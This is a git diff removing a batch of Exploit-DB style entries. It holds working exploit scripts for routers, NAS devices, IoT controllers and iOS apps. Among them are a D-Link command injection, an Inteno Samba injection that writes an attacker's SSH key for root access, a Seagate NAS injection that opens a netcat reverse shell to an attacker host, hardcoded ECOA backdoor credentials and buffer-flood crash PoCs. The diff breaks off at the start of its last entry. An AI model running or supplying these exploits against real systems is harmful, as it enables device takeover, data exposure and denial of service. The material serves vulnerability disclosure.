diff --git a/exploits/hardware/remote/50034.txt b/exploits/hardware/remote/50034.txt
deleted file mode 100644
index 828ab7f44..000000000
--- a/exploits/hardware/remote/50034.txt
+++ /dev/null
@@ -1,109 +0,0 @@ -# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection -# Date: 17-06-2021 -# Exploit Author: Mohammed Hadi (HadiMed) -# Vendor Homepage: https://me.dlink.com/consumer -# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16 -# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R* -# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6) - -### - -#!/bin/bash - -# Exploit by HadiMed - -# Takes advantage of the tftp server that accepts the cfg file blindly -echo -ne "\n" -echo "Exploiting Dlink DSL-2750u version 1.6" -echo -ne "\n\n" - -# Sending the payload -echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1 -echo -ne "\n" - -echo "File uploaded Successfully" -echo "Waiting for router to restart" - -sleep 180 # approximate time for router to restart - -python3 exploit.py - -### - -import requests - -# HTTP request looks like this -''' -POST /cgi-bin/webproc HTTP/1.1 -Host: 192.168.1.1 -Content-Length: 175 -Cache-Control: max-age=0 -Upgrade-Insecure-Requests: 1 -Origin: http://192.168.1.1 -Content-Type: application/x-www-form-urlencoded -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 -Referer: http://192.168.1.1/cgi-bin/webproc -Accept-Encoding: gzip, deflate -Accept-Language: en-US,en;q=0.9 -Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91 -Connection: close - -getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91 -''' - -# 1 Getting a session id - -# password and username crafted by me on the cfg.xml file - -username = "pwned" -password= "pwned" - - -# 
acually the client set the sessionid in condition that the password and username are correct - -Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef" -Contentty="application/x-www-form-urlencoded" -Referer="http://192.168.1.1/cgi-bin/webproc" -Contentlen="175" - -# Sending first request to set our session id -response = requests.post("http://192.168.1.1/cgi-bin/webproc", - headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } -, - data={ "getpage":"html/index.html", - "errorpage":"html/main.html", - "var:menu" : "setup", - "var:page":"wizard", - "obj-action":"auth", - ":username":username, - ":password":password, - ":action":"login", - ":sessionid":"deadbeef" -} - ) - - -Referer = "http://192.168.1.1/cgi-bin/webupg" - -name = "mac" -cmd = "1;sleep${IFS}10;reboot;" - -Contentlen = str(len(name+cmd)+10) - -if response.status_code==302: - print("got sessionid=deadbeef !\n waiting for the reverse shell ...") - -# access cgi-bin/webupg -try : - response = requests.post("http://192.168.1.1/cgi-bin/webupg", - headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } - ,data = {"name":name , "newmac":cmd} , timeout=0.0000000001 - -) - -except requests.exceptions.Timeout : - - print("done router will restart in 20 sec") - -print("Device restarted!") \ No newline at end of file diff --git a/exploits/hardware/webapps/49425.py b/exploits/hardware/webapps/49425.py deleted file mode 100755 index 01e3308ad..000000000 --- a/exploits/hardware/webapps/49425.py +++ /dev/null 
@@ -1,118 +0,0 @@ -# Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC) -# Date: 2021-01 -# Exploit Author: Shizhi He -# Vendor Homepage: https://www.cisco.com/ -# Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7 -# Version: V1.2.1.7 -# Tested on: RV110W V1.2.1.7 -# CVE : CVE-2021-1167 -# References: -# https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md -# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U - -#!/usr/bin/env python2 - -##### -## Cisco RV110W Remote Stack Overflow. -### Tested on version: V1.2.1.7 (maybe useable on other products and versions) - - -import os -import sys -import re -import urllib -import urllib2 -import getopt -import json -import hashlib -import ssl - -ssl._create_default_https_context = ssl._create_unverified_context - -### -# Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco -# This PoC will crash the target HTTP/HTTPS service -### - -#encrypt password -def enc(s): - l = len(s) - s += "%02d" % l - mod = l + 2 - ans = "" - for i in range(64): - tmp = i % mod - ans += s[tmp] - return hashlib.md5(ans).hexdigest() - -if __name__ == "__main__": - print "Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco" - - IP = sys.argv[1] - PORT = sys.argv[2] - USERNAME = sys.argv[3] - PASSWORD = enc(sys.argv[4]) - url = 'https://' + IP + ':' + PORT + '/' - - #get session_id by POST login.cgi - req = urllib2.Request(url + "login.cgi") - req.add_header('Origin', url) - req.add_header('Upgrade-Insecure-Requests', 1) - req.add_header('Content-Type', 'application/x-www-form-urlencoded') - req.add_header('User-Agent', - 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') - req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') - req.add_header('Referer', url) - req.add_header('Accept-Encoding', 'gzip, deflate') - req.add_header('Accept-Language', 
'en-US,en;q=0.9') - req.add_header('Cookie', 'SessionID=') - data = {"submit_button": "login", - "submit_type": "", - "gui_action": "", - "wait_time": "0", - "change_action": "", - "enc": "1", - "user": USERNAME, - "pwd": PASSWORD, - "sel_lang": "EN" - } - r = urllib2.urlopen(req, urllib.urlencode(data)) - resp = r.read() - login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1] - session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1] - print session_id - - #trigger stack overflow through POST vpn_account parameter and cause denial of service - req2 = urllib2.Request(url + "apply.cgi;session_id=" + session_id) - req2.add_header('Origin', url) - req2.add_header('Upgrade-Insecure-Requests', 1) - req2.add_header('Content-Type', 'application/x-www-form-urlencoded') - req2.add_header('User-Agent', - 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') - req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') - req2.add_header('Referer', url) - req2.add_header('Accept-Encoding', 'gzip, deflate') - req2.add_header('Accept-Language', 'en-US,en;q=0.9') - req2.add_header('Cookie', 'SessionID=') - poc = "a" * 4096 - data_cmd = { - "gui_action": "Apply", - "submit_type": "", - "submit_button": "vpn_client", - "change_action": "", - "pptpd_enable": "0", - "pptpd_localip": "10.0.0.1", - "pptpd_remoteip": "10.0.0.10-14", - "pptpd_account": "", - "vpn_pptpd_account": "1", - "vpn_account": poc, - "change_lan_ip": "0", - "netbios_enable": "0", - "mppe_disable": "0", - "importvpnclient": "", - "browser": "", - "webpage_end": "1", - } - r = urllib2.urlopen(req2, urllib.urlencode(data_cmd)) - resp = r.read() - print resp \ No newline at end of file diff --git a/exploits/hardware/webapps/49438.py b/exploits/hardware/webapps/49438.py deleted file mode 100755 index 9634b7434..000000000 --- a/exploits/hardware/webapps/49438.py +++ /dev/null 
@@ -1,188 +0,0 @@ -# Exploit Title: Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated) -# Date: 2020-03-29 -# Exploit Author: Henrik Pedersen -# Vendor Homepage: https://intenogroup.com/ -# Version: Iopsys <3.16.5 -# Fixed Version: Iopsys 3.16.5 -# Tested on: Kali Linux 2020.4 against an Inteno DG200 Router - -# Description: -# It was possible to add newlines to nearly any of the samba share options when creating a new Samba share in Inteno’s Iopsys routers before 3.16.5. This made it possible to change the configurations in smb.conf, giving root access to the filesystem. - -# Patch in release -# notes: https://dev.iopsys.eu/iopsys/iopsyswrt/blob/9d2366785d5a7d896359436149c2dbd3caec1a8e/releasenotes/release-notes-IOP-OS-version-3.16.x.txt - -# Exploit writeup: https://xistens.gitlab.io/xistens/exploits/iopsys-root-filesystem-access/ - -#!/usr/bin/python3 -import json -import sys -import os -import time -import argparse -from websocket import create_connection -from impacket.smbconnection import SMBConnection -from impacket.examples.smbclient import MiniImpacketShell - -""" -Root filesystem access via sambashare name configuration option in Inteno's Iopsys < 3.16.5 - -Usage: smbexploit.py -u -p -k - -Requires: -impacket -websocket-client - -On Windows: -pyreadline - -""" - -def ubusAuth(host, username, password): - """ - https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py - """ - ws = create_connection(f"ws://{host}", header = ["Sec-WebSocket-Protocol: ubus-json"]) - req = json.dumps({ - "jsonrpc": "2.0", "method": "call", - "params": [ - "00000000000000000000000000000000","session","login", - {"username": username,"password": password} - ], - "id": 666 - }) - ws.send(req) - response = json.loads(ws.recv()) - ws.close() - try: - key = response.get('result')[1].get('ubus_rpc_session') - except IndexError: - return None - return key - -def ubusCall(host, key, namespace, argument, params={}): - """ - 
https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py - """ - ws = create_connection(f"ws://{host}", header = ["Sec-WebSocket-Protocol: ubus-json"]) - req = json.dumps({"jsonrpc": "2.0", "method": "call", - "params": [key,namespace,argument,params], - "id": 666}) - ws.send(req) - response = json.loads(ws.recv()) - ws.close() - try: - result = response.get('result')[1] - except IndexError: - if response.get('result')[0] == 0: - return True - return None - return result - -def auth(host, user, password): - print("Authenticating...") - key = ubusAuth(host, user, password) - if not key: - print("[-] Auth failed!") - sys.exit(1) - print(f"[+] Auth successful") - return key - -def smb_put(args): - username = "" - password = "" - - try: - smbClient = SMBConnection(args.host, args.host, sess_port=445) - smbClient.login(username, password, args.host) - - print("Reading SSH key") - try: - with open(args.key_path, "r") as fd: - sshkey = fd.read() - except IOError: - print(f"[-] Error reading {args.sshkey}") - - print("Creating temp file for authorized_keys") - try: - with open("authorized_keys", "w") as fd: - fd.write(sshkey) - path = os.path.realpath(fd.name) - except IOError: - print("[-] Error creating authorized_keys") - - shell = MiniImpacketShell(smbClient) - shell.onecmd("use pwned") - shell.onecmd("cd /etc/dropbear") - shell.onecmd(f"put {fd.name}") - - print("Cleaning up...") - os.remove(path) - except Exception as e: - print("[-] Error connecting to SMB share:") - print(str(e)) - sys.exit(1) - -def main(args): - payload = "pwned]\npath=/\nguest ok=yes\nbrowseable=yes\ncreate mask=0755\nwriteable=yes\nforce user=root\n[abc" - key = auth(args.host, args.user, args.passwd) - print("Adding Samba share...") - smbcheck = json.dumps(ubusCall(args.host, key, "uci", "get", {"config":"samba"})) - if "pwned" in smbcheck: - print("[*] Samba share seems to already exist, skipping") - else: - smba = ubusCall(args.host, key, "uci", "add", { - "config": "samba", 
- "type":"sambashare", - "values": { - "name": payload, - "read_only": "no", - "create_mask":"0775", - "dir_mask":"0775", - "path": "/mnt/", - "guest_ok": "yes" - } - }) - if not smba: - print("[-] Adding Samba share failed!") - sys.exit(1) - - print("Enabling Samba...") - smbe = ubusCall(args.host, key, "uci", "set", - {"config":"samba", "type":"samba", "values": - {"interface":"lan"}}) - if not smbe: - print("[-] Enabling Samba failed!") - sys.exit(1) - - print("Committing changes...") - smbc = ubusCall(args.host, key, "uci", "commit", - {"config":"samba"}) - if not smbc: - print("[-] Committing changes failed!") - sys.exit(1) - - if args.key_path: - # Allow the service to start - time.sleep(2) - smb_put(args) - print(f"[+] Exploit complete. Try \"ssh -i id_rsa root@{args.host}\"") - else: - print("[+] Exploit complete, SMB share added.") - -def parse_args(args): - """ Create the arguments """ - parser = argparse.ArgumentParser() - parser.add_argument("-u", dest="user", help="Username", default="user") - parser.add_argument("-p", dest="passwd", help="Password", default="user") - parser.add_argument("-k", dest="key_path", help="Public ssh key path") - parser.add_argument(dest="host", help="Target host") - - if len(sys.argv) < 2: - parser.print_help() - sys.exit(1) - - return parser.parse_args(args) - -if __name__ == "__main__": - main(parse_args(sys.argv[1:])) \ No newline at end of file diff --git a/exploits/hardware/webapps/49459.txt b/exploits/hardware/webapps/49459.txt deleted file mode 100644 index 14c307200..000000000 --- a/exploits/hardware/webapps/49459.txt +++ /dev/null 
@@ -1,67 +0,0 @@ -# Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated) -# Date: 07.11.2020 -# Exploit Author: LiquidWorm -# Vendor Homepage: https://www.selea.com - -Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure - - -Vendor: Selea s.r.l. -Product web page: https://www.selea.com -Affected version: Model: iZero - Targa 512 - Targa 504 - Targa Semplice - Targa 704 TKM - Targa 805 - Targa 710 INOX - Targa 750 - Targa 704 ILB - Firmware: BLD201113005214 - BLD201106163745 - BLD200304170901 - BLD200304170514 - BLD200303143345 - BLD191118145435 - BLD191021180140 - BLD191021180140 - CPS: 4.013(201105) - 3.100(200225) - 3.005(191206) - 3.005(191112) - -Summary: IP camera with optical character recognition (OCR) software for automatic -number plate recognition (ANPR) also equipped with ADR system that enables it to read -the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number -of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number -plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes -this camera suitable for all installation conditions. Its built-in OCR software works -as an automatic and independent system without the need of a computer, thus giving -autonomy to the device even in the event of an interruption in the connection between -the camera and the operations centre. - -Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream -disclosure when p1.mjpg or p1.264 is called. 
- -Tested on: GNU/Linux 3.10.53 (armv7l) - PHP/5.6.22 - selea_httpd - HttpServer/0.1 - SeleaCPSHttpServer/1.1 - - -Vulnerability discovered by Gjoko 'LiquidWorm' Krstic - @zeroscience - - -Advisory ID: ZSL-2021-5619 -Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php - - -07.11.2020 - --- - - -Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264 -Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg \ No newline at end of file diff --git a/exploits/hardware/webapps/49937.txt b/exploits/hardware/webapps/49937.txt deleted file mode 100644 index 30aea47af..000000000 --- a/exploits/hardware/webapps/49937.txt +++ /dev/null 
@@ -1,47 +0,0 @@ -# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS) -# Date: 01/06/2021 -# Exploit Author: sirpedrotavares -# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html -# Software Link: https://www.chiyu-tech.com/category-hardware.html -# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021 -# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC -# CVE: CVE-2021-31642 -# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks - -Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device. -CVE ID: CVE-2021-31642 -CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H -URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642 - -Affected parameter: page=Component: if.cgi -Payload: -if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 - -====HTTP request====== -GET -/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 -HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) -Gecko/20100101 Firefox/87.0 -Accept: -text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 -Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 -Accept-Encoding: gzip, deflate -Authorization: Basic YWRtaW46YWRtaW4= -Connection: close -Referer: http://127.0.0.1/AccLog.htm -Cookie: fresh= -Upgrade-Insecure-Requests: 1 - - - -Steps to reproduce: - 1. Navigate to the vulnerable device - 2. Make a GET request to the CGI component (if.cgi) - 3. Append the payload at the end of the vulnerable parameter (page) - 4. 
Submit the request and observe payload execution - - - Mitigation: The latest version of the CHIYU firmware should be installed -to mitigate this vulnerability. \ No newline at end of file diff --git a/exploits/hardware/webapps/50132.py b/exploits/hardware/webapps/50132.py deleted file mode 100755 index 4b2aa9629..000000000 --- a/exploits/hardware/webapps/50132.py +++ /dev/null @@ -1,29 +0,0 @@ -# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection -# Date: 15.07.2021 -# Discovered by: Jeroen - IT Nerdbox -# Exploit Author: Metin Yunus Kandemir -# Version: sg2000-2000.1331 -# Vendor Homepage: https://www.seagate.com/ -# Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/ - -#!/usr/bin/python3 - -import requests -import sys - -def exec(target, ncIp, ncPort): - print("[!] Please check netcat listener: "+ ncPort) - url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00" - r = requests.get(url = url) - sys.exit(1) - -def main(args): - if len(args) != 4: - print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0])) - print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80") - sys.exit(1) - exec(target=args[1], ncIp=args[2], ncPort=args[3]) - - -if __name__ == "__main__": - main(args=sys.argv) \ No newline at end of file diff --git a/exploits/hardware/webapps/50281.txt b/exploits/hardware/webapps/50281.txt deleted file mode 100644 index d29e73c82..000000000 --- a/exploits/hardware/webapps/50281.txt +++ /dev/null 
@@ -1,114 +0,0 @@ -# Exploit Title: ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function -# Date: 25.06.2021 -# Exploit Author: Neurogenesia -# Vendor Homepage: http://www.ecoa.com.tw - -ECOA Building Automation System Hidden Backdoor Accounts and backdoor() Function - - -Vendor: ECOA Technologies Corp. -Product web page: http://www.ecoa.com.tw -Affected version: ECOA ECS Router Controller - ECS (FLASH) - ECOA RiskBuster Terminator - E6L45 - ECOA RiskBuster System - RB 3.0.0 - ECOA RiskBuster System - TRANE 1.0 - ECOA Graphic Control Software - ECOA SmartHome II - E9246 - ECOA RiskTerminator - -Summary: -#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are -designed to provide you with the latest in the Human Machine Interface (HMI) technology, -for completely monitoring and controlling management. It may be used singly for small and -medium sized facilities, could be linked together via the high-speed Ethernet to other -servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more -sophisticated applications. The Risk-Terminator practice Web basic conception that with -operation simply and conveniently, totally share risk and make sure of security. Even -remote sites may be controlled and monitored through Ethernet port, which base on standard -transferring protocol like XML, Modbus TCP/IP or BACnet or URL. - -#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP -networking technologies. It incorporates an embedded web server that can deliver user-specific -web pages to any PC or mobile terminal running internet browser software. A user with an -appropriate security codes can made adjustment or monitor the network control unit form -any internet access point in the world. 
It also provides network management, integration -and process control functions for any existing or new building controllers and microprocessor -based equipments or system in buildings. The management function provided by the RiskBuster -such as trend log and alarm generation improves building controllers and microprocessor -based equipments or system management and audit trail capabilities. The integration function -provided by the RiskBuster allows seamless integration such as information sharing (read/write) -between building controllers and microprocessor based equipments or system without any need -of major upgrade or equipments replacement and allow cost saving. The process control functions -provided by the RiskBuster allow global control action to be implemented across any building -controllers and microprocessor based equipments or system to allow full building control. The -RiskBuster provide a truly cost effective solution for any building automation or high level -integration application. A truly Ethernet network compliant feature allows the RiskBuster to -be install anywhere in the building. - -#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for -Building Automate System; Environment control system; HVAC control system and other types of -equipment. Being fully programmable it ensures complete application versatility, allowing -specific products to be created according to customer requests. This controller is a configurable -unitary controller based on the 32bit series microcomputer, with an on-board clock, have two -RS-485 local bus. - -#4 The ECS0000160 is a Router Controller for building and industry products based on various -microprocessors. It not only accessing information but also monitoring and controlling across -Internet directly. The ECS0000160 can totally replace and improve a typical system that always -has tedious panel and complex working process. 
An obviously benefit to our customers is that -ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed -to connect with singular specific operating system. It's like a whole package, which provides -browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all -through web-pages operating, which works base on standard transmission Internet protocol. The -ECS0000160 provides a low industry cost. A truly friendly network interface which is simple -and easy to apply on factory floors. It supports from serial ports with options of RS485. - -#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden -installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A -conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, -integral and differential (P+I+D) and dead-zone control to control accurately. The controller -features contains the sensing system, proportional control systems, computing modules, control -modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, -air monitoring, lighting and power control, the use of premises for buildings, factories, offices, -conference rooms, restaurants, hotels, etc. - -Desc: -The BAS controller has hidden backdoors in several binaries that serve the web application. Any -unauthenticated attacker can download all the resources and binaries/services that serve the controller -and search for the 'backdoor()' function in httpser.elf as well as discover hidden credentials for -backdoor access with full functionality of the Smart Home, Access Control and Building Automation -System solutions. 
- -Tested on: EMBED/1.0 - Apache Tomcat/6.0.44 - Apache Tomcat/6.0.18 - Windows Server - MySQL Version 5.1.60 - MySQL Version 4.0.16 - Version 2.0.1.28 20180628 - - -Vulnerability discovered by Neurogenesia - @zeroscience - - -Advisory ID: ZSL-2021-5674 -Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5674.php - - -25.06.2021 - --- - - -Backdoor Accounts / Authentication Bypass ------------------------------------------ - -- Example of backdoors revealed in httpser.elf binary: -... -... - VAR2 = strstr(ARG1,"username=humexembed&password=simonamandoor"); - if (VAR2 == (char *)0x0) { - VAR2 = strstr(ARG1,"username=amandoor&password=amandoor"); -... -... \ No newline at end of file diff --git a/exploits/ios/dos/49883.py b/exploits/ios/dos/49883.py deleted file mode 100755 index e45d5a843..000000000 --- a/exploits/ios/dos/49883.py +++ /dev/null @@ -1,23 +0,0 @@ -# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) -# Author: Luis Martinez -# Discovery Date: 2021-05-18 -# Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887 -# Software Link: App Store for iOS devices -# Tested Version: 14.16.10 -# Vulnerability Type: Denial of Service (DoS) Local -# Tested on OS: iPhone 7 iOS 14.5.1 - -# Steps to Produce the Crash: -# 1.- Run python code: WebSSH_for_iOS_14.16.10.py -# 2.- Copy content to clipboard -# 3.- Open "WebSSH for iOS" -# 4.- Click -> Tools -# 5.- Click -> mashREPL -# 6.- Paste ClipBoard on "mashREPL>" -# 7.- Intro -# 8.- Crashed - -#!/usr/bin/env python - -buffer = "\x41" * 300 -print (buffer) \ No newline at end of file diff --git a/exploits/ios/dos/49952.py b/exploits/ios/dos/49952.py deleted file mode 100755 index 6d5296fdb..000000000 --- a/exploits/ios/dos/49952.py +++ /dev/null 
@@ -1,35 +0,0 @@ -# Exploit Title: Color Notes 1.4 - Denial of Service (PoC) -# Date: 06-04-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136 -# Version: 1.4 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: -f = open("payload.txt","w") -f.write(buffer) -f.close() -print ("File created") -except: -print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49953.py b/exploits/ios/dos/49953.py deleted file mode 100755 index 86a498847..000000000 --- a/exploits/ios/dos/49953.py +++ /dev/null 
@@ -1,35 +0,0 @@ -# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC) -# Date: 06-04-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221 -# Version: 5.5 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49954.py b/exploits/ios/dos/49954.py deleted file mode 100755 index 66e9c636c..000000000 --- a/exploits/ios/dos/49954.py +++ /dev/null 
@@ -1,35 +0,0 @@ -# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC) -# Date: 06-04-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781 -# Version: 5.3 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49957.py b/exploits/ios/dos/49957.py deleted file mode 100755 index 5e8d8e573..000000000 --- a/exploits/ios/dos/49957.py +++ /dev/null 
@@ -1,35 +0,0 @@ -# Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) -# Date: 06-04-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010 -# Version: 1.4.2 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49978.py b/exploits/ios/dos/49978.py deleted file mode 100755 index 641bdc839..000000000 --- a/exploits/ios/dos/49978.py +++ /dev/null 
@@ -1,35 +0,0 @@ -# Exploit Title: Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) -# Date: 06-07-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/us/app/sticky-notes-widget/id1499269608 -# Version: 3.0.6 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49979.py b/exploits/ios/dos/49979.py deleted file mode 100755 index 0fb3bf745..000000000 --- a/exploits/ios/dos/49979.py +++ /dev/null 
@@ -1,35 +0,0 @@
-# Exploit Title: n+otes 1.6.2 - Denial of Service (PoC)
-# Date: 06-09-2021
-# Author: Geovanni Ruiz
-# Download Link: https://apps.apple.com/us/app/n-otes/id596895960
-# Version: 1.6.2
-# Category: DoS (iOS)
-
-##### Vulnerability #####
-
-Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
-
-# STEPS #
-# Open the program.
-# Create a new Note.
-# Run the python exploit script payload.py, it will create a new payload.txt file
-# Copy the content of the file "payload.txt"
-# Paste the content from payload.txt twice in the new Note.
-# Crashed
-
-Successful exploitation will cause the application to stop working.
-
-I have been able to test this exploit against iOS 14.2.
-
-##### PoC #####
---> payload.py <--
-#!/usr/bin/env python
-buffer = "\x41" * 350000
-
-try:
- f = open("payload.txt","w")
- f.write(buffer)
- f.close()
- print ("File created")
-except:
- print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/50001.py b/exploits/ios/dos/50001.py
deleted file mode 100755
index a6fee8b92..000000000
--- a/exploits/ios/dos/50001.py
+++ /dev/null
@@ -1,35 +0,0 @@
-# Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
